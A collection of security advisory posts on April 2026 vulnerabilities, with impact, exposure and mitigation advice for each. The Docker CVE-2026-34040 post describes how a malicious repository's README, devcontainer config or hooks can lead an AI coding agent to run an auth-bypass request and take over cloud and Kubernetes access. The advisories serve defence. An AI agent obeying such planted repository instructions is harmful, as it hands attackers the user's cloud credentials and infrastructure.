Patch Tuesday covered 163 CVEs, but one dominates the threat-modelling conversation: CVE-2026-33824, a 9.8 CVSS unauthenticated remote code execution bug in the Windows Internet Key Exchange (IKE) Service Extensions. A single malformed packet on UDP 500 or 4500 is enough to reach vulnerable code; no credentials, no user interaction, no existing session. ###### Why IKE is the worst place to have this bug IKE is part of Windows' native IPsec implementation. It runs in a privileged service context, accepts traffic pre-authentication (that is the whole point of key exchange), and is exposed on any host that participates in IPsec — VPN concentrators, domain controllers with IPsec policies, servers running Windows' built-in VPN, and any Windows endpoint that ever negotiates an IPsec tunnel. The practical implication: this bug is positioned almost exactly like EternalBlue was in 2017. Network-adjacent, pre-auth, privileged code path, wormable. The gap between "CVE published" and "ransomware operators scan for it" has historically been days at this severity. Treat the clock as already running. ###### Who is exposed - Windows VPN servers running the RRAS role with IPsec enabled. - Domain controllers enforcing IPsec policy for authenticated-network zones. - Windows Server hosts reachable from the internet with UDP 500/4500 open. - Cloud workloads on Windows with NSG / security-group rules allowing IKE ports — sometimes left open by templates that predate the host's current role. - Internal hosts are exposed to lateral movement once an attacker has a foothold anywhere on the network. > A pre-auth network RCE against a kernel-adjacent service on Windows is the Patch Tuesday entry you stop everything for. This one is that entry for Q2 2026. ###### Mitigation The only durable fix is the patch. Apply the April 2026 cumulative update on every Windows host. In the meantime, for any host you cannot patch immediately: - Block UDP 500 and 4500 at your perimeter firewall for every host that is not an active IPsec endpoint. - Disable the RRAS / IKEEXT service on hosts that do not need IPsec. Many servers enable it by default via group policy but never use it. - Segment VPN concentrators into their own zone so a compromise does not immediately yield lateral pivot. - Enable kernel mitigations (Control Flow Guard, CET) on affected hosts if not already on — these do not stop exploitation but slow down exploit development. ###### The broader pattern Every few years, a pre-auth network CVE lands on a widely-deployed Microsoft protocol service — SMB (EternalBlue, SMBGhost), RDP (BlueKeep), Netlogon (Zerologon), now IKE. The response playbook is always the same: patch urgently, block the port if you cannot, and run post-exploitation detection on the assumption that some hosts were caught before the patch window closed. If your organization does not have a written playbook for "network-reachable Windows RCE disclosed on a Tuesday" yet, this CVE is a good reason to write one. --- # CVE-2026-34040: Docker auth bypass turns AI coding agents into cloud takeover URL: https://keepsecure.io/hub/cve-2026-34040-docker-auth-bypass-ai-agent-takeover Published: 2026-04-22 CVE: CVE-2026-34040 CVSS: 8.8 Product: Docker Engine Type: Auth plugin bypass → container escape → cloud/K8s takeover Disclosed: 2026-04-17 Tags: Docker, auth bypass, AI agents, AI supply chain, cloud takeover, container security An incomplete fix for CVE-2024-41110 lets attackers bypass Docker's authorization plugins. The exploitation path that makes it 2026-specific: a crafted GitHub repository tricks an AI coding agent in a Docker sandbox into taking over the cloud account and Kubernetes clusters the agent can reach. CVE-2026-34040 is the rare CVE that is simultaneously a classic container-escape finding and a 2026-native AI-supply-chain incident. The underlying bug is an incomplete fix for CVE-2024-41110: Docker's authorization plugins are consulted on a specially-crafted API request but — due to the incomplete patch — the request body is not forwarded, so the plugin makes its allow/deny decision on partial information. Attackers can get privileged API calls authorised that should have been blocked. The exploitation path that made it notable is the one Palo Alto's Unit 42 disclosed: a malicious GitHub repo that tricks an AI coding agent running in a Docker-based sandbox into performing the bypass, then pivots from the compromised container to the cloud account and Kubernetes clusters the agent can reach. ###### The AI agent angle 2026 is the first year "AI coding agent compromises the cloud" has been a realistic threat model worth naming. The ingredients: - AI coding agents routinely clone and operate inside arbitrary user-supplied GitHub repositories as part of their normal workflow. - Those agents commonly run in a Docker sandbox on a host with access to the user's cloud credentials and kubeconfig — because the whole point is that the agent needs to make infrastructure changes. - A sufficiently clever malicious repo can contain instructions — in README, in devcontainer config, in a post-install hook — that cause the agent itself to execute the crafted API request. The agent is the unwitting confused deputy. > The new threat surface is not "Docker has a bug." The new threat surface is "an AI agent will helpfully run whatever code a GitHub repo asks it to, inside a container that happens to be running Docker-in-Docker, with your cloud credentials one env call away." ###### Who is exposed - Any team running AI coding agents (Claude Code, Cursor's sandbox, Devin, OpenHands, etc.) that clone and operate on user-supplied repositories inside Docker-based sandboxes. - Docker hosts using authorization plugins — the allow/deny decision is now unreliable until patched. - Shared-tenant CI runners that use Docker and process jobs from untrusted contributors. ###### Mitigation - Upgrade Docker to the patched release from the upstream advisory. - Remove cloud credentials from AI agent sandboxes by default. Use short-lived, scope-narrowed tokens issued per-task rather than long-lived admin credentials mounted at container start. - Run AI agents in an isolation boundary stronger than a shared Docker daemon — Firecracker microVMs, gVisor, or per-task Kubernetes pods with their own IAM principal. Shared Docker is not a security boundary for untrusted code. - Audit recent agent activity for cloud API calls, kubeconfig reads, or Docker socket access that do not match a legitimate user task. Any of these is evidence of a confused-deputy attempt. ###### The broader pattern The lesson here is not "Docker authorization is broken" — Docker has shipped a fix. The lesson is that the 2026 perimeter includes every automated agent that operates on untrusted inputs, and that isolation assumptions from the pre-agent era do not hold. "It runs in a Docker sandbox" is no longer a sufficient answer to "what if the input is malicious?" — because the input can now, credibly, include prompt-injection payloads that turn the agent itself into the attacker's tooling. Organizations building agent infrastructure need to design for the confused-deputy case from day one. --- # CVE-2026-35616: Pre-auth API bypass in FortiClient EMS — CISA KEV URL: https://keepsecure.io/hub/cve-2026-35616-forticlient-ems-auth-bypass Published: 2026-04-22 CVE: CVE-2026-35616 CVSS: 9.1 Product: FortiClient EMS Type: Pre-auth API bypass → privesc Disclosed: 2026-04-04 Tags: FortiClient, EMS, auth bypass, privilege escalation, management plane FortiClient Endpoint Management Server exposes an authentication bypass (CVSS 9.1) that yields privilege escalation on the management plane for an entire endpoint fleet. CISA added it to the Known Exploited Vulnerabilities catalog on April 6, 2026. Fortinet disclosed CVE-2026-35616 on April 4, 2026: a 9.1 CVSS pre-authentication API access bypass in FortiClient Endpoint Management Server that leads directly to privilege escalation. Two days later, CISA added it to the Known Exploited Vulnerabilities catalog — the federal agency's formal signal that in-the-wild exploitation has been confirmed. ###### What an EMS compromise actually means FortiClient EMS is the management plane for a FortiClient endpoint fleet. It issues VPN profiles, pushes ZTNA policy, distributes antivirus updates, and holds inventory of every endpoint under its control. An attacker who reaches administrative API access on EMS does not need to compromise individual endpoints one by one. They compromise the authority that tells every endpoint what to trust. The practical consequences, in order of escalating impact: - Enumerate every endpoint in the environment, its OS version, and its patch state — a reconnaissance gift. - Push a crafted VPN profile that routes traffic through an attacker-controlled gateway. - Issue ZTNA policies that grant specific endpoints (or all of them) access to resources they should not have. - Distribute a malicious software package through the EMS-managed deployment channel — reaching every managed endpoint with the trust level of a legitimate IT push. ###### The "security product as attack surface" pattern CVE-2026-35616 is the latest in a multi-year sequence: security products, sold specifically to protect endpoints, repeatedly turn out to contain pre-authentication vulnerabilities on their own management planes. FortiOS, Fortinet SSL-VPN, Ivanti Connect Secure, SonicWall SSL-VPN, and Sophos UTM have all featured on CISA's KEV list. The endpoint-protection and secure-access-gateway segments of the market have a structural problem: the management surface is both highly privileged and frequently exposed to the internet, because operators want to manage their fleet from anywhere. > Your EMS is a higher-value target than any individual endpoint it manages. Protect it accordingly — or expect it to be compromised first. ###### Mitigation - Patch now. Fortinet's advisory lists the fixed versions; apply them this week, not next sprint. - Audit EMS access logs for unfamiliar administrative actions since the earliest date Fortinet identifies for exploitation. If in doubt, assume compromise and rotate every secret EMS has ever held. - Remove public exposure of the EMS admin API. If remote operators need access, front it with a VPN, Cloudflare Access, or an IP allowlist — not a public-facing TLS endpoint. - Inventory deployed FortiClient packages and verify their provenance. A compromised EMS could have distributed a backdoored update. ###### The broader pattern Pre-authentication bugs on security appliance management planes are not rare events. They are a recurring, structural feature of the market. Organizations that over-index on "we run a commercial security product" as their threat-model justification need to plan for the day that product's management plane is itself the initial access vector. Defense in depth means assuming any single component — including a security product — can be the one that falls first. --- # CVE-2026-33825 'BlueHammer': local privesc in Windows Defender URL: https://keepsecure.io/hub/cve-2026-33825-windows-defender-bluehammer Published: 2026-04-22 CVE: CVE-2026-33825 CVSS: 7.8 Product: Windows Defender Type: Local privesc (race condition) Disclosed: 2026-04-07 Tags: Windows Defender, local privilege escalation, race condition, BlueHammer, endpoint security A race condition in Windows Defender's threat remediation engine (CVSS 7.8) lets a local attacker escalate to SYSTEM. Publicly disclosed April 7, 2026 alongside a working proof-of-concept. On April 7, 2026 researchers published CVE-2026-33825, nicknamed BlueHammer, alongside a fully functional proof-of-concept exploit. The vulnerability is a time-of-check to time-of-use (TOCTOU) race condition inside Windows Defender's threat remediation engine. A local unprivileged user can win the race consistently enough to get arbitrary file operations executed in the SYSTEM context — effectively, a full local privilege escalation from any shell on the host. ###### The uncomfortable symmetry BlueHammer arrives alongside a second researcher publication, RedSun, that demonstrates chaining CVE-2026-33825 with a low-privileged RCE (anything from a browser sandbox escape to a Microsoft Office macro) to go from "attacker has code execution as a normal user" to "attacker owns the host." That chain is the thing defenders worry about, because it removes the final remaining mitigation for a large class of malware: the fact that a non-admin user account should limit the blast radius. A race condition in the code path that removes threats is particularly uncomfortable. The remediation engine runs with SYSTEM privileges because it needs to delete files the user cannot. CVE-2026-33825 is a reminder that every elevated code path is a potential target — including the code paths whose entire purpose is "make the machine safer." ###### Who is exposed - Every Windows 10 and Windows 11 host running Defender as its real-time AV — which is nearly all of them in default configurations. - Windows Server instances with Defender enabled, including AD domain controllers. - VDI / RDS environments where many low-trust users share a host — a BlueHammer PoC on a shared machine is an immediate cross-user escalation risk. > A public local-privesc in Windows Defender is the kind of bug that shows up in commodity malware within days. The pipeline from researcher blog post → Metasploit module → criminal loader is well-worn. ###### Mitigation Microsoft's April 2026 security update addresses CVE-2026-33825 via a Defender engine update pushed through the normal AV definitions channel. That channel updates faster than Patch Tuesday — most hosts receive the fix within 48 hours of release, independent of the OS update cadence. Verify: - Confirm engine version. Run Get-MpComputerStatus and check the AMEngineVersion field against Microsoft's fixed-version guidance. - Force a definition update on hosts where the automatic update channel is throttled: Update-MpSignature. - Audit for suspicious SYSTEM-context file operations originating from the Defender process tree around the time the PoC was released. Host-based EDR with process-ancestry visibility is the tool for this. - For shared-tenant hosts (VDI, RDS, build agents), prioritize verification of the engine update before releasing the host back to users. ###### The broader pattern Defender is not the first AV to have a local privesc, and it will not be the last. The lesson is not "turn off your AV" — the AV is still net-defensive against a much larger threat population. The lesson is that every privileged component requires the same threat modelling as the rest of the attack surface. Security tools are not exempt from being an attack surface. They are, in many environments, the most interesting one to an attacker who has already gotten a toehold. --- # CVE-2026-39987: Pre-auth RCE in Marimo exploited within 10 hours URL: https://keepsecure.io/hub/cve-2026-39987-marimo-rce-exploited-in-10-hours Published: 2026-04-22 CVE: CVE-2026-39987 CVSS: 9.3 Product: Marimo Type: Pre-auth RCE Disclosed: 2026-04-10 Tags: Marimo, Python notebook, pre-auth RCE, AI tooling, MLOps, exploited in the wild A pre-authenticated remote code execution flaw in the Marimo Python notebook (CVSS 9.3) was weaponized and actively exploited within ten hours of public disclosure. Here's what happened and how to respond. On April 10, 2026, maintainers of Marimo — the popular open-source Python notebook — published an advisory for CVE-2026-39987, a pre-authenticated remote code execution vulnerability scoring 9.3 on CVSS. Less than ten hours later, exploitation was observed in the wild, with attackers deploying a new variant of the cross-platform NKAbuse malware family onto compromised hosts. ###### The vulnerability CVE-2026-39987 allows an unauthenticated remote attacker to execute arbitrary code on any reachable Marimo notebook server. Because Marimo is commonly exposed on internal developer machines, CI runners, and increasingly on managed notebook platforms, the effective attack surface is considerably wider than the "just a notebook tool" framing suggests. ###### Ten hours from advisory to exploitation The time-to-exploitation window is the part of this story worth internalizing. Ten hours is not enough time to: - Wait for the next weekly patch cycle. - Route a fix through a multi-team change advisory board. - Regression-test the patch across a full CI matrix. - Work through a backlog of dependency advisories. It is, however, more than enough time for an attacker with a working proof-of-concept to scan the public internet and common internal exposure patterns, drop a payload, and establish persistence. If your incident response playbook implicitly assumes days rather than hours, that assumption will be tested at every subsequent zero-day. > "Ten hours" is the new planning baseline for any pre-auth RCE with a working PoC. Build the pipeline for that, not for the leisurely case. ###### Who is affected Any organization running Marimo as part of its data science, research, or ML development workflow should assume exposure until proven otherwise. Particular attention: - Shared notebook servers reachable on internal networks without strict ingress controls. - CI runners that invoke Marimo during build or test stages. - Container images baked with Marimo for reproducible research environments. - Developer laptops running a local notebook server bound to a non-loopback interface. ###### Mitigation Upgrade to the patched release identified in the upstream advisory. Until that upgrade is verified across all deployments, at minimum: - Remove external network exposure — close the port, add a WAF rule, or shut down non-essential instances. - Inspect outbound network logs for connections matching NKAbuse command-and-control patterns. - Audit process trees, systemd units, and cron entries on Marimo hosts for unexpected persistence. - Rotate any credentials that may have been accessible from the Marimo process environment. ###### The broader pattern This incident is not an outlier. The velocity of exploitation for publicly disclosed pre-auth vulnerabilities has been compressing for years — from months, to weeks, to days, and now to hours. The defensive implication is unavoidable: organizations that ship code without continuous software composition analysis, a live vulnerability management pipeline, and a rehearsed patch workflow are, on any given day, one CVE publication away from a public incident. If you have not recently verified your SCA coverage across Python environments — including notebook tooling — this week is a reasonable time to do so. --- # CVE-2026-33032: Authentication bypass in nginx-ui takes over 2,600+ servers URL: https://keepsecure.io/hub/cve-2026-33032-nginx-ui-auth-bypass-mcpwn Published: 2026-04-22 CVE: CVE-2026-33032 CVSS: 9.8 Product: nginx-ui Type: Auth bypass → Nginx RCE Disclosed: 2026-04-08 Tags: nginx-ui, auth bypass, management plane, unauthenticated RCE, MCPwn A critical authentication bypass in nginx-ui (CVSS 9.8) — dubbed 'MCPwn' by researchers — enables full takeover of the underlying Nginx service and the host it runs on. Over 2,600 exposed instances have been identified. Nginx itself is not vulnerable. nginx-ui — the popular web-based management panel used to configure Nginx without hand-editing config files — is. CVE-2026-33032, rated 9.8 on CVSS and codenamed MCPwn by Pluto Security, lets an unauthenticated attacker bypass login entirely and reach the same administrative surface a logged-in operator would. At least 2,600 publicly reachable instances are already exposed; active exploitation is confirmed. ###### From panel bypass to full server takeover The severity rating reflects what the attacker actually gets. nginx-ui is designed to write Nginx configuration, reload the service, manage TLS certificates, and execute arbitrary shell commands as part of certificate provisioning hooks. An unauthenticated actor who reaches this panel can: - Add a new server block that proxies traffic to an attacker-controlled host. - Install a TLS certificate tied to a hook that runs shell commands at reload. - Edit the main Nginx configuration to inject a response header, a log-to-URL rule, or a backend rewrite. - Read any file the nginx-ui process has access to, including environment secrets passed to child processes. The panel is, by design, a root-equivalent surface for the web tier. Removing authentication from that surface is as bad as it sounds. > If nginx-ui is reachable from the public internet and running an unpatched version, assume compromise and rebuild the host. There is no audit log that definitively tells you "they didn't get in" — only your own network telemetry. ###### Why this keeps happening to admin panels Every few months, a popular admin panel ships an auth bypass. Cockpit, Portainer, phpMyAdmin, Webmin, and now nginx-ui have all been in this list at some point. The pattern is consistent: a panel grows features faster than its authentication layer is hardened, and a single missing check in a middleware or a single over-permissive default route exposes the whole thing. The defensive posture that actually works is treating admin panels as internal-only by default. If your nginx-ui, Portainer, or similar is reachable on port 443 from the internet — even with a "strong password" — you are one bypass disclosure away from a server takeover. That "one disclosure" is not a hypothetical. It is MCPwn today, something else next quarter. ###### Mitigation Upgrade nginx-ui to the patched release from the upstream advisory. Beyond that, apply the controls that would have blunted this regardless of the CVE: - Remove public exposure. Put nginx-ui behind a VPN, Tailscale, Cloudflare Access, or an IP allowlist. An admin panel does not need a public IP. - Run it as a non-root user with the narrowest sudo permissions the reload/cert hooks require. If takeover happens, limit the blast radius. - Audit the config directory (/etc/nginx/ and wherever nginx-ui stores its own state) for unfamiliar server blocks, unknown TLS certs, or recent changes you did not make. - Check outbound traffic from the Nginx host for connections to unfamiliar destinations — a common post-exploitation signal. ###### The broader pattern This CVE fits the same trend as the others we have covered this week: the time from disclosure to mass exploitation has compressed to hours, and the affected surface is rarely the component users think of as "the security-critical one." Nginx is hardened and battle-tested. The Go web panel that writes Nginx's configuration is not. The lesson for organizations operating at scale is that the security boundary worth defending is the management plane, not just the serving plane — and the management plane should never have a public IP. --- # CVE-2026-5281: Chrome zero-day in Dawn/WebGPU under active exploitation URL: https://keepsecure.io/hub/cve-2026-5281-chrome-dawn-webgpu-zero-day Published: 2026-04-22 CVE: CVE-2026-5281 CVSS: 8.8 Product: Google Chrome (Dawn / WebGPU) Type: Use-after-free → renderer RCE Disclosed: 2026-03-31 Tags: Chrome, WebGPU, Dawn, use-after-free, browser zero-day, Electron A high-severity use-after-free in Chrome's Dawn WebGPU implementation is being exploited in the wild. CISA added CVE-2026-5281 to the Known Exploited Vulnerabilities catalog on April 1, 2026. Google shipped an emergency Chrome update for CVE-2026-5281, a high-severity use-after-free in Dawn — the open-source implementation of the WebGPU standard embedded in Chrome. A crafted HTML page can trigger the bug in the renderer process and gain arbitrary code execution inside the renderer sandbox. CISA added the CVE to its KEV catalog on April 1, 2026, confirming in-the-wild exploitation. ###### Why Dawn keeps attracting attacker attention Dawn is a relatively new, large, GPU-adjacent codebase written in C++. It sits on the happy path of every Chrome tab that renders WebGPU content — which increasingly includes AI inference demos, ML-accelerated web apps, and browser-based games. From an attacker's perspective it is a great target: complex binary parser, privileged position relative to the renderer, lightly audited compared to V8, and reachable from a single click on a malicious link. This is the second Dawn/WebGPU CVE in the last six months. Expect more. The WebGPU attack surface is in the same phase of the maturity curve that WebGL was in 2012–2014 — feature-rich, widely deployed, and findable. > A renderer RCE is not a full sandbox escape on its own, but it is the critical first link of a chain that has ended in full system compromise many times. Patch Chrome the same day it ships, not the next sprint. ###### Who is affected - Every Chrome and Chromium-based browser user on versions below the patched release — Chrome, Edge, Brave, Opera, Arc, and Electron-based desktop apps bundling an older Chromium. - Electron apps are especially relevant: Slack, Discord, VS Code, 1Password, Notion, Signal Desktop, and countless others ship their own Chromium. Their patching cadence is slower than browser auto-update. Inventory your Electron apps and confirm they have caught up. - Managed browser fleets (Chrome Enterprise, Edge WDAC, Puppet/Intune-managed endpoints) where auto-update is disabled. Verify the rollout reached production. ###### Mitigation - Confirm Chrome version on every endpoint. chrome://settings/help will force an update check. - Audit Electron apps for bundled Chromium version. If the vendor hasn't shipped an update, raise it with them and consider restricting network access for that app until they do. - Block WebGPU in high-risk profiles via the Disable3DAPIs enterprise policy as a short-term mitigation. This breaks some ML demo sites but removes the attack surface entirely. - Monitor for renderer crashes with unusual signatures — one of the earliest tells for in-the-wild browser exploitation. ###### The broader pattern Chrome zero-days are, by this point, a standing item on any enterprise security operations calendar. What has changed in 2026 is the distribution channel: exploitation is no longer limited to nation-state use against specific targets. Commodity infostealers are bundling fresh browser zero-days within days of public disclosure, and using them to hoover up saved passwords, session cookies, and crypto wallet keys from anyone who browses the wrong page. The old advice — "just keep your browser updated" — remains the most important single piece of end-user security hygiene. It has never been more important. --- # CVE-2026-5760: RCE via malicious GGUF model files in SGLang URL: https://keepsecure.io/hub/cve-2026-5760-sglang-rce-via-malicious-gguf-models Published: 2026-04-22 CVE: CVE-2026-5760 CVSS: 9.8 Product: SGLang Type: RCE via malicious model file Disclosed: 2026-04-15 Tags: SGLang, GGUF, malicious model, AI supply chain, LLM serving, ML inference A CVSS 9.8 vulnerability in SGLang lets an attacker achieve remote code execution by crafting a malicious GGUF model file. The trust boundary has moved from 'downloaded binary' to 'downloaded weights'. SGLang — a widely adopted serving framework for large language models — disclosed CVE-2026-5760 this month, a remote code execution vulnerability rated 9.8 on CVSS. The trigger is not a network request or a misconfigured endpoint. It is the act of loading a model file in the GGUF format, the same format distributed across HuggingFace, Ollama registries, and countless "download this quantised model" tutorials. ###### Why this class of bug matters Until recently, the prevailing mental model for model artifacts was "it's just weights and metadata — a big blob of floats." CVE-2026-5760 joins a growing list of vulnerabilities that invalidate that assumption. Model files are complex, versioned, extensible binary formats parsed by C/C++ code running in-process with the rest of your application. A format parser is an attack surface; a parser trusted with untrusted input is a vulnerability waiting to be found. > Model weights are executable input. Treat a GGUF file from HuggingFace the way you would treat a tarball from a random GitHub gist. ###### The supply chain angle The exploitation path does not require the attacker to compromise SGLang itself. It requires only that they publish a malicious model, name it something plausible, and wait. Typical scenarios: - A developer searches HuggingFace for a quantised Llama or Qwen variant and pulls the highest-ranked result into a local evaluation script. - A deployment pipeline fetches a model by name from a registry, trusting the latest version tag without provenance checks. - A fine-tuning job mirrors a "community" checkpoint into an internal model store that is then consumed by production serving. Any of these is enough for an attacker who owns a popular-sounding model namespace to reach code execution on a GPU host — often one with privileged access to customer data or outbound network paths. ###### Mitigation Upgrade SGLang to the patched release from the upstream advisory. Beyond the immediate patch, this CVE is a prompt to treat model artifacts as a first-class supply-chain concern: - Pin model sources. Fetch only from namespaces you have deliberately approved, not by name search. - Verify provenance. Require signed manifests or checksums tied to a known publisher. Reject unsigned artifacts in production pipelines. - Sandbox model loading. Parse untrusted model files inside a restricted process (seccomp, gVisor, Firecracker) before promoting them to a production serving host. - Inventory your models. The same SBOM discipline you apply to containers and libraries needs to extend to model files — name, version, publisher, checksum. ###### The broader pattern CVE-2026-5760 is the second high-severity RCE we have covered this week in the open-source ML tooling ecosystem. This is not coincidental. As LLM infrastructure matures, its attack surface is being cataloged at the same pace as any other fast-growing stack in its early years — rapid feature velocity, tight release cycles, and parsers written under deadline. Expect more of these. Plan your patching cadence accordingly, and extend your SCA and artifact provenance controls to cover model files, not only code. ---